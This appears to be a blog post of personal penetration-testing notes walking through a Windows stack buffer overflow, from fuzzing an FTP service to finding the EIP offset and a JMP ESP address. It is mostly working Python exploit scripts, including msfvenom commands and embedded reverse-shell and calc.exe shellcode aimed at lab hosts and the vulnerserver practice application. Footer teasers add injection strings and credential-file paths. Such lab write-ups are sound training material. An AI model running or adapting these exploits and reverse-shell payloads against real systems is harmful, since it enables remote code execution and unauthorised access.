Buffer Overflow


Fuzzing

#!/usr/bin/python
import socket

buffer = ["A"]
count = 100

while len(buffer) <= 50:
 buffer.append("A"*count)
 count = count + 100

for strings in buffer:
 print "Fuzzing with %s bytes" % len(strings) 
 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 s.connect(('192.168.24.103',21)) # connect to FTP Server
 s.send(strings + '\r\n') 
 response = s.recv(1024) 
 print response
 s.send("password\r\n")
 response = s.recv(1024) 
 print response 
 s.send('BYE'+'\r\n')
 s.close()

When buffer characters of 400 'A' crash the application 

#!/usr/bin/python
import socket

buffer = 'A' * 400

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.24.103',21)) # connect to FTP Server
s.send(buffer + '\r\n') 
response = s.recv(1024) 
print response 
s.send("password\r\n")
response = s.recv(1024) 
print response 
s.send('BYE'+'\r\n')
s.close()

Immunity Debugger

Debug -> Run (F9)


Controlling EIP

EIP holds the address of the next instruction to be executed 

msf-pattern_create -l 1000

#!usr/bin/python
import socket
import sys
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B"
s.connect(('192.168.24.103',21))
s.send(buffer + '\r\n')
response = s.recv(1024)
print response
s.send('password' + '\r\n')
response = s.recv(1024)
s.send('BYE')
s.close()

Debug -> Restart(Ctrl + F2) 

msf-pattern_offset -q 34694133


#!/usr/bin/python
import socket

buffer = 'A' * 251 #offset
buffer += 'B' * 4 #EIP 42424242
buffer += "C" * (700-offset-4) # Ensure the space is allocated for more than 400 bytes

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.24.103',21)) # connect to FTP Server
s.send(buffer + '\r\n') 
response = s.recv(1024)
print response
s.send("password\r\n")
response = s.recv(1024)
print response 
s.send('BYE'+'\r\n')
s.close()


Replace EIP with JMP ESP

Method 1 

!mona modules

Output
Log data, item 115
 Address=0BADF00D
 Message= 0x7c9c0000 | 0x7d1d7000 | 0x00817000 | False  | True    | False |  False   | True   | 6.00.2900.5512 [SHELL32.dll] (C:\WINDOWS\system32\SHELL32.dll)

!mona find -s "\xff\xe4" -m <dll file>

Output
Log data, item 23
 Address=7C9D30D7
 Message= 0x7c9d30d7 : "\xff\xe4" |  {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)

Method 2 

!mona jmp -r esp

 Alt + L to show log window

Shellcode

Bad Characters 

\x00 #NULL byte opcode
\x0D #CR return character
\x0A #LF line feed
Manually check for bad characters 
badchars = ("\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")

msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d" -f c
msfvenom -p windows/shell_reverse_tcp LHOST=<attacker_ip_addr> LPORT=8099-f c -a x86 --platform windows -b "\x00\x0a\x0d" -e x86/shikata_ga_nai

Troubleshoot

undefined method `encode_base64url' for Rex::Text:Module (NoMethodError) 
bundle exec msfvenom -p windows/shell_reverse_tcp LHOST=<attacker_ip_addr> LPORT=8099 -f c -b "\x00\x0a\x0d" 


#!usr/bin/python
import socket
import sys
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
buffer = "A"*251
buffer+= "\xD7\x30\x9D\x7C" #JMP ESP Address
buffer+= "\x90"*30 #NOP (No Operation) Sledges
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.24.101 LPORT=8099 -f c -b "\x00\x0a\x0d"
buffer+= ("\xbb\x88\x12\xd4\xd9\xda\xdb\xd9\x74\x24\xf4\x58\x29\xc9\xb1"
"\x52\x31\x58\x12\x03\x58\x12\x83\x60\xee\x36\x2c\x8c\xe7\x35"
"\xcf\x6c\xf8\x59\x59\x89\xc9\x59\x3d\xda\x7a\x6a\x35\x8e\x76"
"\x01\x1b\x3a\x0c\x67\xb4\x4d\xa5\xc2\xe2\x60\x36\x7e\xd6\xe3"
"\xb4\x7d\x0b\xc3\x85\x4d\x5e\x02\xc1\xb0\x93\x56\x9a\xbf\x06"
"\x46\xaf\x8a\x9a\xed\xe3\x1b\x9b\x12\xb3\x1a\x8a\x85\xcf\x44"
"\x0c\x24\x03\xfd\x05\x3e\x40\x38\xdf\xb5\xb2\xb6\xde\x1f\x8b"
"\x37\x4c\x5e\x23\xca\x8c\xa7\x84\x35\xfb\xd1\xf6\xc8\xfc\x26"
"\x84\x16\x88\xbc\x2e\xdc\x2a\x18\xce\x31\xac\xeb\xdc\xfe\xba"
"\xb3\xc0\x01\x6e\xc8\xfd\x8a\x91\x1e\x74\xc8\xb5\xba\xdc\x8a"
"\xd4\x9b\xb8\x7d\xe8\xfb\x62\x21\x4c\x70\x8e\x36\xfd\xdb\xc7"
"\xfb\xcc\xe3\x17\x94\x47\x90\x25\x3b\xfc\x3e\x06\xb4\xda\xb9"
"\x69\xef\x9b\x55\x94\x10\xdc\x7c\x53\x44\x8c\x16\x72\xe5\x47"
"\xe6\x7b\x30\xc7\xb6\xd3\xeb\xa8\x66\x94\x5b\x41\x6c\x1b\x83"
"\x71\x8f\xf1\xac\x18\x6a\x92\x12\x74\x6c\x07\xfb\x87\x8c\xd8"
"\x58\x0e\x6a\x8c\x8e\x47\x25\x39\x36\xc2\xbd\xd8\xb7\xd8\xb8"
"\xdb\x3c\xef\x3d\x95\xb4\x9a\x2d\x42\x35\xd1\x0f\xc5\x4a\xcf"
"\x27\x89\xd9\x94\xb7\xc4\xc1\x02\xe0\x81\x34\x5b\x64\x3c\x6e"
"\xf5\x9a\xbd\xf6\x3e\x1e\x1a\xcb\xc1\x9f\xef\x77\xe6\x8f\x29"
"\x77\xa2\xfb\xe5\x2e\x7c\x55\x40\x99\xce\x0f\x1a\x76\x99\xc7"
"\xdb\xb4\x1a\x91\xe3\x90\xec\x7d\x55\x4d\xa9\x82\x5a\x19\x3d"
"\xfb\x86\xb9\xc2\xd6\x02\xc9\x88\x7a\x22\x42\x55\xef\x76\x0f"
"\x66\xda\xb5\x36\xe5\xee\x45\xcd\xf5\x9b\x40\x89\xb1\x70\x39"
"\x82\x57\x76\xee\xa3\x7d")
s.connect(('192.168.24.103',21))
s.send(buffer + '\r\n')
response = s.recv(1024)
print response
s.send('password' + '\r\n')
response = s.recv(1024)
s.send('BYE')
s.close()


Practice

Vulnerable Application: https://github.com/stephenbradshaw/vulnserver 

#!/usr/bin/python
# Tested on Microsoft Windows 7 Enterprise

import socket

buf = "TRUN /.:/"
buf += "\x41" * 2003 # EIP 386F4337
buf += "\xaf\x11\x50\x62" #JMP ESP 
buf += "\x90" * 30 #NOP Sledges
buf += ("\xda\xd5\xb8\x7d\xb3\x4c\x5e\xd9\x74\x24\xf4\x5f\x29\xc9\xb1"
"\x31\x31\x47\x18\x83\xc7\x04\x03\x47\x69\x51\xb9\xa2\x79\x17"
"\x42\x5b\x79\x78\xca\xbe\x48\xb8\xa8\xcb\xfa\x08\xba\x9e\xf6"
"\xe3\xee\x0a\x8d\x86\x26\x3c\x26\x2c\x11\x73\xb7\x1d\x61\x12"
"\x3b\x5c\xb6\xf4\x02\xaf\xcb\xf5\x43\xd2\x26\xa7\x1c\x98\x95"
"\x58\x29\xd4\x25\xd2\x61\xf8\x2d\x07\x31\xfb\x1c\x96\x4a\xa2"
"\xbe\x18\x9f\xde\xf6\x02\xfc\xdb\x41\xb8\x36\x97\x53\x68\x07"
"\x58\xff\x55\xa8\xab\x01\x91\x0e\x54\x74\xeb\x6d\xe9\x8f\x28"
"\x0c\x35\x05\xab\xb6\xbe\xbd\x17\x47\x12\x5b\xd3\x4b\xdf\x2f"
"\xbb\x4f\xde\xfc\xb7\x6b\x6b\x03\x18\xfa\x2f\x20\xbc\xa7\xf4"
"\x49\xe5\x0d\x5a\x75\xf5\xee\x03\xd3\x7d\x02\x57\x6e\xdc\x48"
"\xa6\xfc\x5a\x3e\xa8\xfe\x64\x6e\xc1\xcf\xef\xe1\x96\xcf\x25"
"\x46\x68\x9a\x64\xee\xe1\x43\xfd\xb3\x6f\x74\x2b\xf7\x89\xf7"
"\xde\x87\x6d\xe7\xaa\x82\x2a\xaf\x47\xfe\x23\x5a\x68\xad\x44"
"\x4f\x0b\x30\xd7\x13\xe2\xd7\x5f\xb1\xfa") #calc.exe

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.56.104',9999)) # connect to FTP Server
s.send(buf + '\r\n') 
response = s.recv(1024)
s.close()

Popular posts from this blog

Remote Desktop Protocol (RDP) Security

Image
Common Remote Desktop Protocol (RDP) Vulnerabilities Terminal Services Encryption Level is Medium or Low Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness Terminal Services Doesn't Use Network Level Authentication (NLA) Only Terminal Services Encryption Level is Medium or Low Vulnerability Assessment: Host Assessment: Remediation: Local Computer Policy/Computer Configuration/Administrative Templates/Windows Components/Remote Desktop Services/Remote Desktop Session Host/Security/Set client connection encryption level Set client connection encryption level to High Note: High: The High setting encrypts data sent from the client to the server and from the server to the client by using strong 128-bit encryption. Use this encryption level in environments that contain only 128-bit clients (for example, clients that run Remote Desktop Connection). Clients that do not support this encryption level cannot connect to RD Se
Read more

Penetration Testing - Network

Image
Manual Vulnerability Assessment TCP/21: FTP Anonymous FTP Enabled anonymous guest TCP/22: SSH nmap -p 22 --script ssh2-enum-algos <ip_address> SSH Weak Algorithms Supported SSH Server CBC Mode Ciphers Enabled ssh -oCiphers=<ciphers> <ip_address> SSH Weak MAC Algorithms Enabled ssh -oMACs=<algorithm> <ip_address> SSH Protocol v1 Supported ssh -1 <ip_address> -v Hardening on SSH Ciphers aes256-ctr,aes192-ctr,aes128-ctr MACs hmac-sha2-512-etm@openssh.com,hmac-sha2-256-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512,hmac-sha2-256,umac-128@openssh.com TCP/23: Telnet Unencrypted Telnet Server telnet <ip_address> 23 TCP/25: SMTP SMTP Service Cleartext Login Permitted telnet <ip_address> 25 EHLO <ip_address> AUTH LOGIN Mailserver answer to VRFY and EXPN requests * nc <ip_address> 25 EXPN root VRFY root TCP/53: DNS DNS Server Cache Snooping Remote Information Disclosure
Read more

Damn Vulnerable Web Services (DVWS) - Walkthrough

Image
Installation Damn Vulnerable Web Services  (DVWS) is an insecure web application with multiple vulnerable web service components that can be used to learn real world web service vulnerabilities. https://github.com/snoopysecurity/dvws WSDL Enumeration Spider DVWS using Burp Suite and look for service.php Requests processed by SOAP service include  check_user_information ,  owasp_apitop10 ,  population  and  return_price XPATH Injection User Login: 1' or '1'='1 User Password: 1' or '1'='1 Command Injection Original Request parameter value of name is " find "   by default  Edited Request change the parameter value of  name  from "find" to " dir "   Cross Site Tracing (XST) Hint of " The NuSOAP Library service is vulnerable to a Cross-site scripting flaw " is given by DVWS. Exploit is published at exploit DB ( https://www.exploit-db.com/e
Read more

Offensive Security Testing Guide

Image
This cheat sheet is the compilation of commands we learnt to exploit the vulnerable machines. The commands below may not be enough for you to obtain your Offensive Security Certified Professional (OSCP). So... Try Harder! Information Gathering Operating System Windows Interesting Path "Documents and Settings"/Administrator/Desktop file:///C:/xampp/readme_en.txt file:///C:/xampp/passwords.txt file:///C:/xampp/webdav/webdav.txt file:///C:/xampp/apache/conf/extra/httpd-dav.conf file:///C:/xampp/apache/conf/extra/httpd-xampp.conf file:///C:/xampp/apache/logs/access.log file:///C:/xampp/apache/logs/error.log file:///C:/xampp/security/webdav.htpasswd file:///C:/xampp/htdocs/dashboard/phpinfo.php file:///C:/xampp/phpmyadmin/config.inc.php file:///C:/xampp/php/logs/php_error_log file:///C:/xampp/mysql/bin/my.ini C:\Users\<User>\AppData\Local\Temp #Email Address C:\Users\<User>\AppData\Local\Microsoft\Outlook Active Connection netstat -anob #R
Read more

Server Message Block (SMB) Security

Image
Common SMB related vulnerabilities Microsoft Windows SMBv1 Multiple Vulnerabilities SMB Signing Disabled Microsoft Windows SMB NULL Session Authentication Microsoft Windows SMB Shares Unprivileged Access Network Discovery: TCP port 5357 - Web Services on Devices API (WSDAPI) File and Printer Sharing: TCP port 135 - Remote Procedure Call (RPC) TCP port 139 - NETBIOS Session Service TCP port 445 - Server Message Block (SMB) By disable NetBIOS over TCP/IP (TCP Port 139), NETBIOS name discovery will be prevented Microsoft Windows SMBv1 Multiple Vulnerabilities Vulnerability Assessment: NSE script smb-protocols can be used to check if the server supported NT LM 0.12 (SMBv1) . Host Assessment: Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters | ForEach-Object {Get-ItemProperty $_.pspath} Remediation: Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters
Read more

Host Configuration Assessment - Windows

Image
OS Information Gathering systeminfo wmic computersystem get domainrole 0 - Standalone workstation 1 - Member workstation 2 - Standalone server 3 - Member server 4 - Domain controller secedit /export /cfg cfg.ini > nul net user administrator > netuseradmin.txt auditpol.exe /get /category:* > auditpol.txt netsh advfirewall show allprofiles > firewall.txt net accounts > netaccount.txt gpresult /f /h evid/gporesult.html > nul accesschk /accepteula -q -a * > accesschk.txt *Simplify the process with Scgary ! User Right Assignment type cfg.ini | grep "^SeAuditPrivilege\|^SeCreatePagefilePrivilege\|^SeRemoteShutdownPrivilege\|^SeRemoteInteractiveLogonRight\|^SeEnableDelegationPrivilege\|^SeLockMemoryPrivilege\|^SeDenyNetworkLogonRight\|^SeChangeNotifyPrivilege\|^SeDebugPrivilege\|^SeDenyBatchLogonRight\|^SeCreateGlobalPrivilege\|^SeShutdownPrivilege\|^SeIncreaseQuotaPrivilege\|^SeTrustedCredManAccessPrivilege\|^SeDenyInteractiveLogonRight
Read more